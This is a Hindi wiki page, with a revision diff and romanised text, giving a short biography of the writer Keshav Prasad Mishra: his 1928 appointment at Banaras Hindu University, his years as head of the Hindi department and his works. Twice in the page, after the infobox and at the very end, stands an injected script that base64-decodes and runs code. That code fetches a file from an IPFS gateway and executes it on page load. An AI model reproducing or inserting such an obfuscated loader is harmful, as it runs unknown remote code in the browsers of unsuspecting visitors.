Difference between revisions of "केशव प्रसाद मिश्र"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
Line 1: Line 1:
'''केशव प्रसाद मिश्र''' (जन्म- [[1885]], [[काशी]], [[उत्तर प्रदेश]]; मृत्यु- [[21 मार्च]], [[1952]]) [[हिन्दी]] के प्रमुख साहित्यकारों में से एक थे। एक भाषण के दौरान '[[विनयपत्रिका]]' की अत्यधिक प्रशंसा करने के कारण भारत के प्रसिद्ध स्वतंत्रता सेनानी [[पण्डित मदन मोहन मालवीय]] ने गद्गद होकर इन्हें सन [[1928]] ई. में '[[काशी हिन्दू विश्वविद्यालय]]' में अध्यापक नियुक्त किया था।<ref>{{cite web |url=http://www.kashikatha.com/%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A5%8D%E0%A4%A4%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%B5/%E0%A4%B8%E0%A4%BE%E0%A4%B9%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A4%BE%E0%A4%B0/ |title=काशी के साहित्यकार|accessmonthday= 11 जनवरी|accessyear=2014 |last= |first= |authorlink= |format= |publisher= |language=हिन्दी}}</ref>
+
{{सूचना बक्सा साहित्यकार
 
+
|चित्र=blankimage.png
 +
|चित्र का नाम=
 +
|पूरा नाम=केशव प्रसाद मिश्र
 +
|अन्य नाम=
 +
|जन्म=1885
 +
|जन्म भूमि= [[काशी]], [[उत्तर प्रदेश]]
 +
|मृत्यु= [[21 मार्च]], [[1952]]
 +
|मृत्यु स्थान=
 +
|अविभावक=भगवती प्रसाद मिश्र (पिता)
 +
|पालक माता-पिता=
 +
|पति/पत्नी=
 +
|संतान=
 +
|कर्म भूमि=
 +
|कर्म-क्षेत्र=
 +
|मुख्य रचनाएँ='हिन्दी वैधुत शब्दावली', 'हरिवंशगुण स्मृति',  'गद्य भारती', 'काव्यलोक', 'पदचि' आदि
 +
|विषय=
 +
|भाषा=[[हिन्दी]]
 +
|विद्यालय=
 +
|शिक्षा=
 +
|पुरस्कार-उपाधि=
 +
|प्रसिद्धि=
 +
|विशेष योगदान=
 +
|नागरिकता=भारतीय
 +
|संबंधित लेख=
 +
|शीर्षक 1=
 +
|पाठ 1=
 +
|शीर्षक 2=
 +
|पाठ 2=
 +
|अन्य जानकारी=[[कालिदास]] की अमृत कृति '[[मेघदूत]]' के पद्यानुवाद की भूमिका में रस सिद्धान्त का विवेचन केशव प्रसाद मिश्र ने किया था।
 +
|बाहरी कड़ियाँ=
 +
|अद्यतन=
 +
}}
 +
'''केशव प्रसाद मिश्र''' ([[अंग्रेज़ी]]: ''Keshav Prasad Mishra'', जन्म- [[1885]], [[काशी]], [[उत्तर प्रदेश]]; मृत्यु- [[21 मार्च]], [[1952]]) [[हिन्दी]] के प्रमुख साहित्यकारों में से एक थे। एक भाषण के दौरान '[[विनयपत्रिका]]' की अत्यधिक प्रशंसा करने के कारण [[भारत]] के प्रसिद्ध स्वतंत्रता सेनानी [[पण्डित मदन मोहन मालवीय]] ने गद्गद होकर इन्हें सन [[1928]] ई. में '[[काशी हिन्दू विश्वविद्यालय]]' में अध्यापक नियुक्त किया था।<ref>{{cite web |url=http://www.kashikatha.com/%E0%A4%B5%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A5%8D%E0%A4%A4%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%B5/%E0%A4%B8%E0%A4%BE%E0%A4%B9%E0%A4%BF%E0%A4%A4%E0%A5%8D%E0%A4%AF%E0%A4%95%E0%A4%BE%E0%A4%B0/ |title=काशी के साहित्यकार|accessmonthday= 11 जनवरी|accessyear=2014 |last= |first= |authorlink= |format= |publisher=काशी कथा|language=हिन्दी}}</ref>
 +
==संक्षिप्त परिचय==
 
*सन 1885 में काशी (वर्तमान [[बनारस]]) के 'भदैनी' में केशव प्रसाद मिश्र का जन्म हुआ था।
 
*सन 1885 में काशी (वर्तमान [[बनारस]]) के 'भदैनी' में केशव प्रसाद मिश्र का जन्म हुआ था।
*इनके [[पिता]] का नाम भगवती प्रसाद मिश्र था। अपने सभी भाइयों में केशव प्रसाद मिश्र ज्येष्ठ थे।
+
*इनके [[पिता]] का नाम भगवती प्रसाद मिश्र था। अपने सभी भाइयों में केशव प्रसाद मिश्र [[ज्येष्ठ]] थे।
 
*एक भाषण देते समय केशव प्रसाद मिश्र ने '[[विनयपत्रिका]]' की अत्यधिक प्रशंसा की, जिससे प्रसन्न होकर मालवीय जी ने इन्हें 'काशी हिन्दू विश्वविद्यालय' में अध्यापक बना दिया।
 
*एक भाषण देते समय केशव प्रसाद मिश्र ने '[[विनयपत्रिका]]' की अत्यधिक प्रशंसा की, जिससे प्रसन्न होकर मालवीय जी ने इन्हें 'काशी हिन्दू विश्वविद्यालय' में अध्यापक बना दिया।
 
*केशव प्रसाद मिश्र 'काशी हिन्दू विश्वविद्यालय' में सन [[1941]]-[[1950]] तक [[हिन्दी]] विभागाध्यक्ष के रूप में प्रतिष्ठित रहे।
 
*केशव प्रसाद मिश्र 'काशी हिन्दू विश्वविद्यालय' में सन [[1941]]-[[1950]] तक [[हिन्दी]] विभागाध्यक्ष के रूप में प्रतिष्ठित रहे।
 
*[[कालिदास]] की अमृत कृति '[[मेघदूत]]' के पद्यानुवाद की भूमिका में रस सिद्धान्त का विवेचन केशव प्रसाद मिश्र ने किया था।
 
*[[कालिदास]] की अमृत कृति '[[मेघदूत]]' के पद्यानुवाद की भूमिका में रस सिद्धान्त का विवेचन केशव प्रसाद मिश्र ने किया था।
*'गद्य भारती', 'काव्यलोक', 'पदचि' नामक आदि अनेक ग्रन्थों की भूमिका इन्होंने लिखी। 'हिन्दी वैधुत शब्दावली' की रचना इन्होंने [[1925]] की।
+
*'गद्य भारती', 'काव्यलोक', 'पदचि' नामक आदि अनेक ग्रन्थों की भूमिका इन्होंने लिखी।
 +
*'हिन्दी वैधुत शब्दावली' की रचना इन्होंने [[1925]] की।
 
*'[[सरस्वती (पत्रिका)|सरस्वती]]' तथा 'इन्दु' पत्रिकाओं में बराबर इनके लेख छपते रहे।
 
*'[[सरस्वती (पत्रिका)|सरस्वती]]' तथा 'इन्दु' पत्रिकाओं में बराबर इनके लेख छपते रहे।
 
*'हरिवंशगुण स्मृति' नामक काव्य की रचना भी केशव प्रसाद मिश्र ने की थी।
 
*'हरिवंशगुण स्मृति' नामक काव्य की रचना भी केशव प्रसाद मिश्र ने की थी।
 
*केशव प्रसाद मिश्र का निधन [[21 मार्च]], [[1952]] को हुआ।
 
*केशव प्रसाद मिश्र का निधन [[21 मार्च]], [[1952]] को हुआ।
 +
 +
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
Line 18: Line 54:
 
[[Category:साहित्यकार]][[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:काशी]][[Category:उपन्यासकार]][[Category:जीवनी साहित्य]][[Category:साहित्य कोश]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:चरित कोश]]
 
[[Category:साहित्यकार]][[Category:लेखक]][[Category:आधुनिक लेखक]][[Category:काशी]][[Category:उपन्यासकार]][[Category:जीवनी साहित्य]][[Category:साहित्य कोश]][[Category:प्रसिद्ध व्यक्तित्व]][[Category:चरित कोश]]
 
__INDEX__
 
__INDEX__
 +
__NOTOC__

Revision as of 10:58, 9 March 2014

keshav prasad mishr
poora nam keshav prasad mishr
janm 1885
janm bhoomi kashi, uttar pradesh
mrityu 21 march, 1952
mukhy rachanaean 'hindi vaidhut shabdavali', 'harivanshagun smriti', 'gady bharati', 'kavyalok', 'padachi' adi
bhasha hindi
nagarikata bharatiy
any janakari kalidas ki amrit kriti 'meghadoot' ke padyanuvad ki bhoomika mean ras siddhant ka vivechan keshav prasad mishr ne kiya tha.
inhean bhi dekhean kavi soochi, sahityakar soochi

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

keshav prasad mishr (aangrezi: Keshav Prasad Mishra, janm- 1885, kashi, uttar pradesh; mrityu- 21 march, 1952) hindi ke pramukh sahityakaroan mean se ek the. ek bhashan ke dauran 'vinayapatrika' ki atyadhik prashansa karane ke karan bharat ke prasiddh svatantrata senani pandit madan mohan malaviy ne gadgad hokar inhean san 1928 ee. mean 'kashi hindoo vishvavidyalay' mean adhyapak niyukt kiya tha.[1]

sankshipt parichay

  • san 1885 mean kashi (vartaman banaras) ke 'bhadaini' mean keshav prasad mishr ka janm hua tha.
  • inake pita ka nam bhagavati prasad mishr tha. apane sabhi bhaiyoan mean keshav prasad mishr jyeshth the.
  • ek bhashan dete samay keshav prasad mishr ne 'vinayapatrika' ki atyadhik prashansa ki, jisase prasann hokar malaviy ji ne inhean 'kashi hindoo vishvavidyalay' mean adhyapak bana diya.
  • keshav prasad mishr 'kashi hindoo vishvavidyalay' mean san 1941-1950 tak hindi vibhagadhyaksh ke roop mean pratishthit rahe.
  • kalidas ki amrit kriti 'meghadoot' ke padyanuvad ki bhoomika mean ras siddhant ka vivechan keshav prasad mishr ne kiya tha.
  • 'gady bharati', 'kavyalok', 'padachi' namak adi anek granthoan ki bhoomika inhoanne likhi.
  • 'hindi vaidhut shabdavali' ki rachana inhoanne 1925 ki.
  • 'sarasvati' tatha 'indu' patrikaoan mean barabar inake lekh chhapate rahe.
  • 'harivanshagun smriti' namak kavy ki rachana bhi keshav prasad mishr ne ki thi.
  • keshav prasad mishr ka nidhan 21 march, 1952 ko hua.



panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. kashi ke sahityakar (hindi) kashi katha. abhigaman tithi: 11 janavari, 2014.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>